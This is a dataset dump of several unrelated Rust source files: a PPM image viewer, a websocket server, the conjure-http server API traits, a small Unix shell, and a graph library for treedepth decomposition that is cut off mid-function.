self.memory.insert((*board).clone(), best_move);
Ok(best_move)
}
fn eval_board(board: &Board, depth: i8) -> i8 {
match board.who_won() {
0 => 0,
winner_value => winner_value * 10 + (depth as i8 * -winner_value),
}
}
}
| true |
23f7fe88f58dbf3c3aa944a3bd096a63e2141594
|
Rust
|
BorisWauters/SecureSoftware_imgparser
|
/src/main.rs
|
UTF-8
| 5,216 | 2.90625 | 3 |
[] |
no_license
|
extern crate sdl2;
#[macro_use] extern crate simple_error;
use std: : error: : Error;
use std: : path: : Path;
use std: : fs: : File;
use std: : io: : {Read, Cursor};
use byteorder:: {LittleEndian, ReadBytesExt};
use std: : fmt;
use std: : io: : prelude:: *;
use std: : io: : {Seek, SeekFrom};
use sdl2: : pixels:: Color;
use sdl2: : rect: : Rect;
use shuteye: : sleep;
use std: : time: : Duration;
#[derive(Clone)]
struct Pixel
{
R: u32,
G: u32,
B: u32
}
struct Image
{
width : u32,
height: u32,
pixels: Vec<Vec<Pixel>>
}
fn show_image(image: &Image)
{
let sdl = sdl2::init().unwrap();
let video_subsystem = sdl.video().unwrap();
let display_mode = video_subsystem.current_display_mode(0).unwrap();
let w = match display_mode.w as u32 > image.width {
true => image.width,
false => display_mode.w as u32
};
let h = match display_mode.h as u32 > image.height {
true => image.height,
false => display_mode.h as u32
};
let window = video_subsystem
.window("Image", w, h)
.build()
.unwrap();
let mut canvas = window
.into_canvas()
.present_vsync()
.build()
.unwrap();
let black = sdl2::pixels::Color::RGB(0, 0, 0);
let mut event_pump = sdl.event_pump().unwrap();
// render image
canvas.set_draw_color(black);
canvas.clear();
for r in 0..image.height {
for c in 0..image.width {
let pixel = &image.pixels[image.height as usize - r as usize - 1][c as usize];
canvas.set_draw_color(Color::RGB(pixel.R as u8, pixel.G as u8, pixel.B as u8));
canvas.fill_rect(Rect::new(c as i32, r as i32, 1, 1)).unwrap();
}
}
canvas.present();
'main: loop
{
for event in event_pump.poll_iter() {
match event {
sdl2::event::Event::Quit {..} => break 'main,
_ => {},
}
}
sleep(Duration::new(0, 250000000));
}
}
fn read_num(cursor: &mut Cursor<Vec<u8>>) -> Result<u32, Box<std::error::Error>> {
let mut v: Vec<u8> = vec![];
let mut c: [u8; 1] = [0];
// consume whitespace
loop {
cursor.read(&mut c)?;
match &c {
b" " | b"\t" | b"\n" => { },
_ => { cursor.seek(std::io::SeekFrom::Current(-1)); break; }
}
}
// read number
loop {
cursor.read(&mut c)?;
match c[0] {
b'0' ... b'9' => { v.push(c[0]); },
b' ' | b'\t' | b'\n' => { cursor.seek(std::io::SeekFrom::Current(-1)); break; },
_ => { bail!("Parse error") }
}
}
let num_str = std::str::from_utf8(&v)?;
let num = num_str.parse::<u32>()?;
Ok(num)
}
fn decode_ppm_image(cursor: &mut Cursor<Vec<u8>>) -> Result<Image, Box<std::error::Error>> {
let mut image = Image {
width : 0,
height: 0,
pixels: vec![]
};
// read header
let mut c: [u8; 2] = [0; 2];
cursor.read(&mut c)?;
match &c {
b"P6" => { },
_ => { bail!("error") }
}
let w = read_num(cursor)?;
let h = read_num(cursor)?;
let cr = read_num(cursor)?;
print!("width: {}, height: {}, color range: {}\n", w, h, cr);
// TODO: Parse the image here
let mut pxls:Vec<Vec<Pixel>> = vec![];
let mut buff: [u8; 1] = [0];
loop{
cursor.read(&mut buff)?;
match &buff {
b" " | b"\t" | b"\n" => {},
_ => { cursor.seek(std::io::SeekFrom::Current(-1)); break; }
};
};
for x in 0..h {
let mut row: Vec<Pixel> = vec!();
for y in 0..w {
let mut mv: Vec<u8> = vec![];
for mut z in 0..3 {
mv.push(cursor.read_u8()?);
}
let px = Pixel {
R: mv[0] as u32,
G: mv[1] as u32,
B: mv[2] as u32
};
row.push(px);
}
pxls.insert(0, row);
}
image = Image {
width : w,
height: h,
pixels: pxls
};
Ok(image)
}
fn main()
{
let args: Vec<String> = std::env::args().collect();
if args.len() < 2 {
eprintln!("Syntax: {} <filename>", args[0]);
return;
}
let path = Path::new(&args[1]);
let display = path.display();
let mut file = match File::open(&path) {
Err(why) => panic!("Could not open file: {} (Reason: {})",
display, why.description()),
Ok(file) => file
};
// read the full file into memory. panic on failure
let mut raw_file = Vec::new();
file.read_to_end(&mut raw_file).unwrap();
// construct a cursor so we can seek in the raw buffer
let mut cursor = Cursor::new(raw_file);
let mut image = match decode_ppm_image(&mut cursor) {
Ok (img) => img,
Err(why) => panic!("Could not parse PPM file - Desc: {}", why.description()),
};
show_image(&image);
}
| true |
c82b04237f89c7723f93a1045c030450a660d70a
|
Rust
|
gregscott94/gspos-server
|
/src/main.rs
|
UTF-8
| 2,183 | 2.890625 | 3 |
[] |
no_license
|
extern crate ws;
extern crate nickel;
use std::thread;
use std::time;
use std::env;
use ws::{listen, Handler, Sender, Result, Message, Handshake, CloseCode, Error};
use nickel::{Nickel, Mountable, StaticFilesHandler};
mod youtube;
struct Server {
out: Sender,
}
impl Handler for Server {
fn on_open(&mut self, _: Handshake) -> Result<()> {
Ok(println!("The client has connected"))
}
fn on_message(&mut self, msg: Message) -> Result<()> {
// Echo the message to all connected clients
self.out.broadcast(msg)
}
fn on_close(&mut self, code: CloseCode, reason: &str) {
match code {
CloseCode::Normal => println!("The client is done with the connection."),
CloseCode::Away => println!("The client is leaving the site."),
CloseCode::Abnormal => println!(
"Closing handshake failed! Unable to obtain closing status from client."),
_ => println!("The client encountered an error: {}", reason),
}
}
fn on_error(&mut self, err: Error) {
println!("The server encountered an error: {:?}", err);
}
}
fn main() {
let mut prod_env = "".to_string();
let ws_server_thread = thread::Builder::new().name("ws_server".to_string()).spawn(move || {
println!("Starting websocket server..");
listen("127.0.0.1:3012", |out| { Server { out: out } }).unwrap()
}).unwrap();
thread::sleep(time::Duration::from_millis(1000));
match env::var("PROD_ENV".to_string()) {
Ok(val) => prod_env = val,
Err(e) => println!("Operating in dev mode due to: {}", e),
}
if prod_env != "" {
let app_router_thread = thread::Builder::new().name("app_router".to_string()).spawn(move || {
let mut app_router = Nickel::new();
println!("Starting app router..");
app_router.mount("/controller/", StaticFilesHandler::new("app/controller/"));
app_router.mount("/display/", StaticFilesHandler::new("app/display/"));
app_router.listen("127.0.0.1:6767").unwrap();
}).unwrap();
let _ = app_router_thread.join();
}
let _ = ws_server_thread.join();
println!("Server closing down..");
}
| true |
ff67828189d6c0c830be3ce881e876a9604364c1
|
Rust
|
svc-excavator-bot-org/conjure-rust
|
/conjure-http/src/server.rs
|
UTF-8
| 11,838 | 2.578125 | 3 |
[
"Apache-2.0"
] |
permissive
|
// Copyright 2019 Palantir Technologies, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//! The Conjure HTTP server API.
use crate::{PathParams, QueryParams};
use async_trait::async_trait;
use conjure_error::{Error, InvalidArgument};
use http::{HeaderMap, Method};
use serde::{Deserializer, Serialize};
use std::error;
use std::future::Future;
use std::io::Write;
use std::pin::Pin;
/// A trait implemented by synchronous endpoint handlers.
pub trait Handler<T, B, R>
where
B: RequestBody,
R: VisitResponse,
{
/// Handles a synchronous request.
fn handle(
&self,
service: &T,
path_params: &PathParams,
query_params: &QueryParams,
headers: &HeaderMap,
body: B,
response_visitor: R,
) -> Result<R::Output, Error>;
}
/// A trait implemented by asynchronous endpoint handlers.
pub trait AsyncHandler<T, B, R>
where
T: Sync + Send,
B: RequestBody + Send,
B::BinaryBody: Send,
R: AsyncVisitResponse + Send,
{
/// Handles an asynchronous request.
fn handle<'a>(
&self,
service: &'a T,
path_params: &'a PathParams,
query_params: &'a QueryParams,
headers: &'a HeaderMap,
body: B,
response_visitor: R,
) -> Pin<Box<dyn Future<Output = Result<R::Output, Error>> + Send + 'a>>
where
T: 'a,
B: 'a,
R: 'a;
}
/// A parameter of an endpoint.
#[derive(Copy, Clone, PartialEq, Debug)]
pub struct Parameter {
name: &'static str,
type_: ParameterType,
safe: bool,
}
impl Parameter {
/// Creates a new parameter.
#[inline]
pub const fn new(name: &'static str, type_: ParameterType) -> Parameter {
Parameter {
name,
type_,
safe: false,
}
}
/// Sets the safety of the parameter.
#[inline]
pub const fn with_safe(mut self, safe: bool) -> Parameter {
self.safe = safe;
self
}
/// Returns the name of the parameter.
#[inline]
pub fn name(&self) -> &'static str {
self.name
}
/// Returns the type of the parameter.
#[inline]
pub fn type_(&self) -> ParameterType {
self.type_
}
/// Returns true if the parameter is safe for logging.
#[inline]
pub fn safe(&self) -> bool {
self.safe
}
}
/// The specific type of a parameter.
#[derive(Copy, Clone, PartialEq, Debug)]
pub enum ParameterType {
/// A path parameter.
Path(PathParameter),
/// A query parameter.
Query(QueryParameter),
/// A header parameter.
Header(HeaderParameter),
}
/// A path parameter.
#[derive(Copy, Clone, PartialEq, Debug)]
pub struct PathParameter(());
impl PathParameter {
/// Creates a new path parameter.
#[inline]
pub const fn new() -> PathParameter {
PathParameter(())
}
}
/// A query parameter.
#[derive(Copy, Clone, PartialEq, Debug)]
pub struct QueryParameter {
key: &'static str,
}
impl QueryParameter {
/// Creates a new query parameter.
#[inline]
pub const fn new(key: &'static str) -> QueryParameter {
QueryParameter { key }
}
/// Returns the key corresponding to this parameter in a URI's query.
#[inline]
pub fn key(&self) -> &'static str {
self.key
}
}
/// A header parameter.
#[derive(Copy, Clone, PartialEq, Debug)]
pub struct HeaderParameter {
header: &'static str,
}
impl HeaderParameter {
/// Creates a new header parameter.
#[inline]
pub const fn new(header: &'static str) -> HeaderParameter {
HeaderParameter { header }
}
/// Returns the header corresponding to this parameter in an HTTP request.
#[inline]
pub fn header(&self) -> &'static str {
self.header
}
}
/// Information about an endpoint of a resource.
pub struct Metadata {
name: &'static str,
method: Method,
path: &'static str,
parameters: &'static [Parameter],
deprecated: bool,
}
impl Metadata {
/// Creates a new metadata object.
#[inline]
pub const fn new(
name: &'static str,
method: Method,
path: &'static str,
parameters: &'static [Parameter],
deprecated: bool,
) -> Metadata {
Metadata {
name,
method,
path,
parameters,
deprecated,
}
}
/// Returns the endpoint's name.
#[inline]
pub const fn name(&self) -> &'static str {
self.name
}
/// Returns the endpoint's HTTP method.
#[inline]
pub const fn method(&self) -> &Method {
&self.method
}
/// Returns the endpoint's HTTP path template.
#[inline]
pub const fn path(&self) -> &'static str {
self.path
}
/// Returns the endpoint's parameters.
#[inline]
pub const fn parameters(&self) -> &'static [Parameter] {
self.parameters
}
/// Returns if the endpoint is deprecated.
#[inline]
pub const fn deprecated(&self) -> bool {
self.deprecated
}
}
/// A synchronous HTTP endpoint.
pub struct Endpoint<T, B, R>
where
T: 'static,
B: RequestBody + 'static,
R: VisitResponse + 'static,
{
/// Information about the endpoint.
pub metadata: Metadata,
/// The handler for the endpoint.
pub handler: &'static (dyn Handler<T, B, R> + Sync + Send),
}
/// An asynchronous HTTP endpoint.
pub struct AsyncEndpoint<T, B, R>
where
T: 'static,
B: RequestBody + 'static,
R: AsyncVisitResponse + 'static,
{
/// Information about the endpoint.
pub metadata: Metadata,
/// The handler for the endpoint.
pub handler: &'static (dyn AsyncHandler<T, B, R> + Sync + Send),
}
/// An HTTP resource.
///
/// The server-half of a Conjure service implements this trait.
pub trait Resource<I, O>: Sized {
/// The resource's name.
const NAME: &'static str;
/// Returns the resource's HTTP endpoints.
// FIXME ideally this would be a &'static [Endpoint] once const fns become more powerful
fn endpoints<B, R>() -> Vec<Endpoint<Self, B, R>>
where
B: RequestBody<BinaryBody = I>,
R: VisitResponse<BinaryWriter = O>;
}
/// An asynchronous HTTP resource.
///
/// The server-half of a Conjure service implements this trait.
pub trait AsyncResource<I, O>: Sized + Sync + Send {
/// The resource's name.
const NAME: &'static str;
/// Returns the resource's HTTP endpoints.
// FIXME ideally this would be a &'static [Endpoint] once const fns become more powerful
fn endpoints<B, R>() -> Vec<AsyncEndpoint<Self, B, R>>
where
B: RequestBody<BinaryBody = I> + Send,
B::BinaryBody: Send,
R: AsyncVisitResponse<BinaryWriter = O> + Send;
}
/// An HTTP request body.
pub trait RequestBody {
/// The binary body type.
type BinaryBody;
/// Accepts a visitor, calling the correct method corresponding to this body type.
fn accept<V>(self, visitor: V) -> Result<V::Output, Error>
where
V: VisitRequestBody<Self::BinaryBody>;
}
/// A visitor over request body formats.
pub trait VisitRequestBody<T>: Sized {
/// The output type returned by visit methods.
type Output;
/// Visits an empty body.
///
/// The default implementation returns an error.
fn visit_empty(self) -> Result<Self::Output, Error> {
Err(Error::service_safe(
"unexpected empty request body",
InvalidArgument::new(),
))
}
/// Visits a serializable body.
///
/// The default implementation returns an error.
fn visit_serializable<'de, D>(self, deserializer: D) -> Result<Self::Output, Error>
where
D: Deserializer<'de>,
D::Error: Into<Box<dyn error::Error + Sync + Send>>,
{
let _ = deserializer;
Err(Error::service_safe(
"unexpected serializable request body",
InvalidArgument::new(),
))
}
/// Visits a streaming binary body.
///
/// The default implementation returns an error.
fn visit_binary(self, body: T) -> Result<Self::Output, Error> {
let _ = body;
Err(Error::service_safe(
"unexpected binary request body",
InvalidArgument::new(),
))
}
}
/// An HTTP response.
pub trait Response<W> {
/// Accepts a visitor, calling the correct method corresponding to the response type.
fn accept<V>(self, visitor: V) -> Result<V::Output, Error>
where
V: VisitResponse<BinaryWriter = W>;
}
/// An asynchronous HTTP response.
pub trait AsyncResponse<W> {
/// Accepts a visitor, calling the correct method corresponding to the response type.
fn accept<V>(self, visitor: V) -> Result<V::Output, Error>
where
V: AsyncVisitResponse<BinaryWriter = W>;
}
/// A visitor over response body formats.
pub trait VisitResponse {
/// The server's binary response body writer type.
type BinaryWriter;
/// The output type returned by visit methods.
type Output;
/// Visits an empty body.
fn visit_empty(self) -> Result<Self::Output, Error>;
/// Visits a serializable body.
fn visit_serializable<T>(self, body: T) -> Result<Self::Output, Error>
where
T: Serialize + 'static;
/// Visits a streaming binary body.
fn visit_binary<T>(self, body: T) -> Result<Self::Output, Error>
where
T: WriteBody<Self::BinaryWriter> + 'static;
}
/// A visitor over asynchronous response body formats.
pub trait AsyncVisitResponse {
/// The server's binary response body writer type.
type BinaryWriter;
/// The output type returned by visit methods.
type Output;
/// Visits an empty body.
fn visit_empty(self) -> Result<Self::Output, Error>;
/// Visits a serializable body.
fn visit_serializable<T>(self, body: T) -> Result<Self::Output, Error>
where
T: Serialize + 'static + Send;
/// Visits a streaming binary body.
fn visit_binary<T>(self, body: T) -> Result<Self::Output, Error>
where
T: AsyncWriteBody<Self::BinaryWriter> + 'static + Send;
}
/// A trait implemented by streaming bodies.
pub trait WriteBody<W> {
/// Writes the body out, in its entirety.
fn write_body(self, w: &mut W) -> Result<(), Error>;
}
impl<W> WriteBody<W> for Vec<u8>
where
W: Write,
{
fn write_body(self, w: &mut W) -> Result<(), Error> {
w.write_all(&self).map_err(Error::internal_safe)
}
}
/// A trait implemented by asynchronous streaming bodies.
///
/// This trait can most easily be implemented with the [async-trait crate](https://docs.rs/async-trait).
///
/// # Examples
///
/// ```ignore
/// use async_trait::async_trait;
/// use conjure_error::Error;
/// use conjure_http::server::AsyncWriteBody;
/// use std::pin::Pin;
/// use tokio_io::{AsyncWrite, AsyncWriteExt};
///
/// pub struct SimpleBodyWriter;
///
/// #[async_trait]
/// impl<W> AsyncWriteBody<W> for SimpleBodyWriter
/// where
/// W: AsyncWrite + Send,
/// {
/// async fn write_body(self, mut w: Pin<&mut W>) -> Result<(), Error> {
/// w.write_all(b"hello world").await.map_err(Error::internal_safe)
/// }
/// }
/// ```
#[async_trait]
pub trait AsyncWriteBody<W> {
/// Writes the body out, in its entirety.
async fn write_body(self, w: Pin<&mut W>) -> Result<(), Error>;
}
| true |
3b21541fb0d7a307c80b771235b5007157ddd8ad
|
Rust
|
ravinderj/rush
|
/src/main.rs
|
UTF-8
| 2,606 | 2.625 | 3 |
[] |
no_license
|
extern crate chrono;
use std::env;
use std::fs::OpenOptions;
use std::io::{Error, Write};
use std::os::unix::process::ExitStatusExt;
use std::process::{Command, ExitStatus, Stdio, Child};
use rush::builtins::builtins;
use rush::input::*;
use rush::output::println_err;
use rush::rush::Rush;
use rush::utils::get_histfile_path;
fn main() {
let greeting = "Welcome to RUSH.......";
println!("{}", greeting);
loop {
let input = read_line(build_prompt());
match launch(Rush::from(input.clone())) {
Ok(status) => {
if let Some(code) = status.code() {
env::set_var("STATUS", code.to_string())
}
}
Err(_) => {
env::set_var("STATUS", 127.to_string());
println_err("Command not found".to_owned())
}
}
save_history(input);
}
}
fn build_prompt() -> String {
let prompt = "≈>";
env::current_dir().unwrap().to_string_lossy().to_string() + prompt
}
fn launch(command: Rush) -> Result<ExitStatus, Error> {
match command {
Rush::Bin(cmd, args) => {
builtins()
.get(&cmd)
.map_or_else(|| execute(cmd, args.clone()),
|builtin| builtin(args.clone()))
}
Rush::Empty => Ok(ExitStatus::from_raw(0)),
Rush::Piped(mut commands) => {
let last = commands.pop();
let x = commands
.iter()
.fold(None, |r: Option<Child>, c| {
let stdin = r.map(|c| Stdio::from(c.stdout.unwrap()))
.unwrap_or(Stdio::inherit());
spawn_c(c, stdin, Stdio::piped())
})
.unwrap();
spawn_c(&last.unwrap(), Stdio::from(x.stdout.unwrap()), Stdio::inherit())
.unwrap()
.wait()
}
}
}
fn spawn_c(r: &Rush, stdin: Stdio, stdout: Stdio) -> Option<Child> {
match r {
Rush::Bin(cmd, args) => spawn(cmd, args, stdin, stdout).ok(),
_ => None
}
}
fn execute(cmd: String, args: Vec<String>) -> Result<ExitStatus, Error> {
spawn(&cmd, &args, Stdio::inherit(), Stdio::inherit())
.map(|mut c| c.wait())?
}
fn spawn(cmd: &String, args: &Vec<String>, stdin: Stdio, stdout: Stdio) -> Result<Child, Error> {
Command::new(cmd)
.args(args)
.stdin(stdin)
.stdout(stdout)
.spawn()
}
fn save_history(cmd: String) {
let timestamp = chrono::Local::now().format("%s").to_string();
match cmd.as_str() {
"" => (),
_ => {
let mut file = OpenOptions::new()
.create(true).append(true)
.open(get_histfile_path()).unwrap();
file.write((timestamp + ";" + cmd.as_str() + "\n").as_bytes()).unwrap();
}
}
}
| true |
15a1fd716818b53bc87ed0b02aeb89459750bdba
|
Rust
|
maxbannach/Fluid
|
/src/graph.rs
|
UTF-8
| 19,680 | 3.1875 | 3 |
[
"MIT"
] |
permissive
|
use std::collections::{HashSet, HashMap, VecDeque};
use std::mem;
use std::sync::atomic::AtomicBool;
pub static GLOBAL_ABORT: AtomicBool = AtomicBool::new(false);
#[derive(Debug)]
pub struct Graph {
pub n: usize, // vertices are 0,1,...,n.1 (Some might get removed later on)
pub neighbors: Vec<Vec<usize>>, // neighbors of vertex i
neighbors_pos: Vec<HashMap<usize, usize>>,// At which position of the neighbor[i] vector is vertex v?
}
impl Graph {
/// Allocate memory for a graph with n vertices.
///
pub fn new(n: usize) -> Graph {
Graph{
n: n,
neighbors: vec![Vec::new(); n],
neighbors_pos: vec![HashMap::new(); n],
}
}
pub fn myclone(&self) -> Graph {
Graph{
n: self.n,
neighbors: self.neighbors.clone(),
neighbors_pos: self.neighbors_pos.clone(),
}
}
/// Add the undirected edge {u,v} to the graph.
///
/// *Assumes:*
/// - u,v in {0,...,n-1}
/// - {u,v} not already present in the graph
///
pub fn add_edge(&mut self, u: usize, v: usize) {
self.neighbors[u].push(v);
self.neighbors[v].push(u);
self.neighbors_pos[u].insert(v, self.neighbors[u].len() - 1);
self.neighbors_pos[v].insert(u, self.neighbors[v].len() - 1);
}
// Remove vertex from graph.
// Returns the neighbors, that have a degree of zero and of one after
// this removal. Note: the information about deg zero nodes is crucial,
// since there is no way to distinguish these isolated nodes from formerly
// removed nodes.
pub fn remove_vertex(&mut self, v: usize) -> (Vec<usize>, Vec<usize>) {
let mut deg_zero = vec![];
let mut deg_one = vec![];
// To avoid mutability issues with the iterator, we move the neighbor vector of v
// and replace it with an empty one (since v gets removed).
let vneigh = mem::replace(&mut self.neighbors[v], Vec::new());
// Remove v in the neighbor lists.
for &w in vneigh.iter() {
self.remove_neighbor(w, v);
if self.neighbors[w].len() == 0 {
deg_zero.push(w);
} else if self.neighbors[w].len() == 1 {
deg_one.push(w);
}
}
(deg_zero, deg_one)
}
// Remove all edges that go to the given component.
pub fn separate_vertex(&mut self, v: usize, component: &HashSet<usize>) -> (Vec<usize>, Vec<usize>) {
let mut deg_zero = vec![];
let mut deg_one = vec![];
// To avoid mutability issues with the iterator, we move the neighbor vector of v
// and replace it with an empty one (since v gets removed).
let vneigh = mem::replace(&mut self.neighbors[v], Vec::new());
//self.neighbors_pos[v] = HashMap::new();
// Remove v in the neighbor lists.
for &w in vneigh.iter() {
if component.contains(&w) {
self.remove_neighbor(w, v);
if self.neighbors[w].len() == 0 {
deg_zero.push(w);
} else if self.neighbors[w].len() == 1 {
deg_one.push(w);
}
} else {
self.neighbors[v].push(w);
self.neighbors_pos[v].insert(w, self.neighbors[v].len() - 1);
}
}
if self.neighbors[v].len() == 1 {
deg_one.push(v);
}
(deg_zero, deg_one)
}
// Remove neighbor v in the neighbor list of w.
pub fn remove_neighbor(&mut self, w: usize, v: usize) {
// Where is v in neighbors[w]? This position will be free.
let v_pos = match self.neighbors_pos[w].remove(&v) {
Some(v_pos) => v_pos,
None => return
};
// Move the last element to v_pos...
let last = match self.neighbors[w].pop() {
Some(v) => v,
None => return
};
// ... if it is not v itself.
if last != v {
self.neighbors[w][v_pos] = last;
// Update position of "last" element.
self.neighbors_pos[w].insert(last, v_pos);
}
}
pub fn number_of_edges(&self, vertices: &[usize]) -> usize {
let mut cnt = 0;
for &v in vertices {
cnt += self.neighbors[v].len();
}
cnt / 2
}
pub fn dfs_edges(&self, start_at: usize) -> Vec<(usize, usize)> {
let mut edges: Vec<(usize,usize)> = Vec::new();
let mut stack = Vec::new();
let mut visited = HashSet::new();
visited.insert(start_at);
stack.push( (start_at, self.neighbors[start_at].iter()) );
while let Some((u, mut neigh_iter)) = stack.pop() {
// Find next child.
let v = match neigh_iter.next() {
Some(&v) => v,
None => {
continue;
}
};
// Put iterator back to the stack.
stack.push((u, neigh_iter));
if visited.contains(&v) {
continue;
}
visited.insert(v);
stack.push((v, self.neighbors[v].iter()));
edges.push((u, v));
}
edges
}
pub fn bfs_edges(&self, start_at: usize) -> Vec<(usize, usize)> {
let mut edges = Vec::new();
let mut queue = VecDeque::with_capacity(self.n);
let mut visited = HashSet::new();
visited.insert(start_at);
queue.push_back(start_at);
while let Some(u) = queue.pop_front() {
for &v in self.neighbors[u].iter() {
if visited.contains(&v) {
continue;
}
visited.insert(v);
queue.push_back(v);
edges.push((u,v));
}
}
edges
}
pub fn connected_components(&self, vertices: &[usize]) -> Vec<Vec<usize>> {
let mut visited = HashSet::new();
let mut comps = Vec::new();
for &v in vertices {
if visited.contains(&v) {
continue;
}
let mut comp = vec![v];
visited.insert(v);
for (_v, w) in self.dfs_edges(v) {
comp.push(w);
visited.insert(w);
}
comps.push(comp);
}
comps
}
pub fn connected_subset_test(&self, vert_set: &HashSet<usize>, mut to_be_reached: HashSet<usize>) -> Vec<Vec<usize>> {
if to_be_reached.len() <= 1 {
return vec![];
}
let mut comps = Vec::new();
let mut visited = HashSet::new();
while let Some(&v) = to_be_reached.iter().next() {
if visited.contains(&v) {
continue;
}
let mut comp = vec![v];
visited.insert(v);
to_be_reached.remove(&v);
let mut queue = VecDeque::new();
queue.push_back(v);
while let Some(u) = queue.pop_front() {
for &w in self.neighbors[u].iter() {
if !vert_set.contains(&w) {
continue;
}
if visited.contains(&w) {
continue;
}
if to_be_reached.remove(&w) {
if to_be_reached.len() == 0 && comps.len() == 0 {
return vec![];
}
}
comp.push(w);
visited.insert(w);
queue.push_back(w);
}
}
comps.push(comp);
}
comps
}
pub fn connected_components_subgraph(&self, vertices: &[usize], forbidden: HashSet<usize>) -> Vec<Vec<usize>> {
let mut visited = forbidden;
let mut comps = Vec::new();
let mut queue = VecDeque::new();
for &v in vertices {
if visited.contains(&v) {
continue;
}
let mut comp = vec![v];
visited.insert(v);
queue.push_back(v);
while let Some(u) = queue.pop_front() {
for &w in self.neighbors[u].iter() {
if visited.contains(&w) {
continue;
}
comp.push(w);
visited.insert(w);
queue.push_back(w);
}
}
comps.push(comp);
}
comps
}
//fn articulation_points(vertices: &usize) -> Vec<usize> {
//fn biconnected_components(vertices: &usize) -> Vec<Vec<usize>> {
// self._biconnected_dfs(vertices)
//}
pub fn biconnected_components(&self, vertices: &[usize]) -> (HashSet<usize>, Vec<HashSet<usize>>) {
let (articulation, comp_edges) = self._biconnected_dfs(vertices, true);
let art_set = articulation.iter().cloned().collect();
let mut components = vec![];
for edges in comp_edges.iter() {
let mut comp = HashSet::new();
for (u,v) in edges.iter() {
comp.insert(*u);
comp.insert(*v);
}
components.push(comp);
}
(art_set, components)
}
pub fn _biconnected_dfs(&self, vertices: &[usize], compute_components: bool) -> (Vec<usize>, Vec<Vec<(usize, usize)>>) {
// depth-first search algorithm to generate articulation points
// and biconnected components
let mut components = vec![];
let mut articulation = vec![];
let mut visited = HashSet::new();
for &start in vertices.iter() {
if visited.contains(&start) {
continue;
}
let mut discovery = HashMap::new();
discovery.insert(start, 0); // "time" of first discovery of node during search
let mut low = HashMap::new();
low.insert(start, 0);
let mut root_children = 0;
visited.insert(start);
let mut edge_stack = vec![];
let mut stack = vec![(start, start, self.neighbors[start].iter())];
while let Some((grandparent, parent, mut children)) = stack.pop() {
// Find next child.
let child = match children.next() {
Some(&v) => v,
None => {
if stack.len() > 1 {
if low[&parent] >= discovery[&grandparent] {
if compute_components {
//eprintln!("suche {:?} in {:?}", (grandparent,parent), edge_stack);
let ind = edge_stack.iter().position(|&elem| elem == (grandparent, parent)).unwrap();
let suffix = edge_stack.split_off(ind);
//eprintln!("split in {:?} und {:?}", edge_stack, suffix);
components.push(suffix);
}
articulation.push(grandparent);
}
if low[&parent] < low[&grandparent] {
low.insert(grandparent, low[&parent]);
}
} else if stack.len() == 1 { // length 1 so grandparent is root
root_children += 1;
if compute_components {
let ind = edge_stack.iter().position(|&elem| elem == (grandparent, parent)).unwrap();
components.push(edge_stack[ind..].to_vec());
}
}
continue;
}
};
// Put iterator back to the stack.
stack.push((grandparent, parent, children));
if grandparent == child {
continue;
}
if visited.contains(&child) {
if discovery[&child] <= discovery[&parent] { // back edge
if discovery[&child] < low[&parent] {
low.insert(parent, discovery[&child]);
}
if compute_components {
//eprintln!("push {:?}", (parent, child));
edge_stack.push((parent, child));
}
}
} else {
low.insert(child, discovery.len());
discovery.insert(child, discovery.len());
visited.insert(child);
stack.push((parent, child, self.neighbors[child].iter()));
if compute_components {
//eprintln!("push {:?}", (parent, child));
edge_stack.push((parent, child));
}
}
}
if root_children > 1 {
articulation.push(start);
}
}
(articulation, components)
}
}
pub struct Decomposition {
pub parent: Vec<Option<usize>>, // parent of each vertex in the treedepth decomposition (if set yet)
pub orig_g: Graph,
}
impl Decomposition {
/// Allocate memory for a graph with n vertices.
///
pub fn new(g: &Graph) -> Decomposition {
let orig_g = g.myclone();
Decomposition{
parent: vec![None; g.n],
orig_g,
}
}
/// Computes the depth of the tree stored in self.parent via path-compression.
/// This operation takes time O(n) and does not modify the graph.
///
pub fn get_depth(&self) -> usize {
let n = self.parent.len();
let mut s = Vec::with_capacity(n); // take clean copy of pointer structure
for v in 0..n { // path-compression will modify this structure
let p = match self.parent[v] {
Some(p) => p,
None => v
};
s.insert(v,p);
}
let mut depth = vec![2; n];
let mut stack = Vec::with_capacity(n);
for mut v in 0..n { // for every vertex v of the tree we do once:
while v != s[v] { // (i) crawl up the tree to find the root of v
stack.push(v);
v = s[v];
}
stack.pop();
while let Some(w) = stack.pop() { // (ii) crawl down to compress the path and
depth[w] = depth[s[w]] + 1; // to compute the depth
s[w] = v;
}
}
// done
return *depth.iter().max().unwrap(); // maximum depth of any vertex is depth of the tree
}
pub fn subtrees(&self) -> Vec<(usize, Vec<usize>)> {
let n = self.parent.len();
// Compute children in decomposition tree T.
let mut children = vec![Vec::new(); n];
let mut child_cnt = vec![0; n];
let mut root = 0;
for v in 0..n {
if let Some(w) = self.parent[v] {
children[w].push(v);
child_cnt[w] += 1;
} else {
root = v;
}
}
// Build stack with children on top, and parents somewhere below.
// Hence, for each node the children have been processed before the node
// is popped.
let mut children_first_stack = vec![root];
{
let mut helper_queue = VecDeque::new();
helper_queue.push_back(root);
while let Some(v) = helper_queue.pop_front() {
for &w in children[v].iter() {
helper_queue.push_back(w);
children_first_stack.push(w);
}
}
}
// Compute, which subtrees of T induce a tree in G.
let mut is_tree = vec![false; n];
while let Some(v) = children_first_stack.pop() {
if children[v].len() == 0 {
is_tree[v] = true;
continue;
}
let mut maybe_tree = true;
for &w in children[v].iter() {
if is_tree[w] == false {
maybe_tree = false;
break;
}
}
if !maybe_tree { continue };
// From now on, all children in this subtree of T are marked to be a tree.
// All parents still are not marked as tree. Thus, is_tree can be used
// as "visited" indicator.
let mut cnt = 0;
for &w in self.orig_g.neighbors[v].iter() {
if is_tree[w] == true {
cnt += 1;
}
}
if cnt == children[v].len() {
is_tree[v] = true;
}
}
// Find subtree roots in T, that induce a tree in G.
let mut subtree_roots = vec![];
for v in 0..n {
if children[v].len() == 0 { continue; } // No leafs of T as subtree root.
match self.parent[v] {
None => if is_tree[v] { subtree_roots.push(v) },
Some(p) => if is_tree[v] && !is_tree[p] { subtree_roots.push(v) },
}
}
//eprintln!("{:?}", subtree_roots);
let mut subtrees = vec![];
for &st_root in subtree_roots.iter() {
let mut subtree = vec![st_root];
let mut stack = vec![st_root];
while let Some(v) = stack.pop() {
for &w in children[v].iter() {
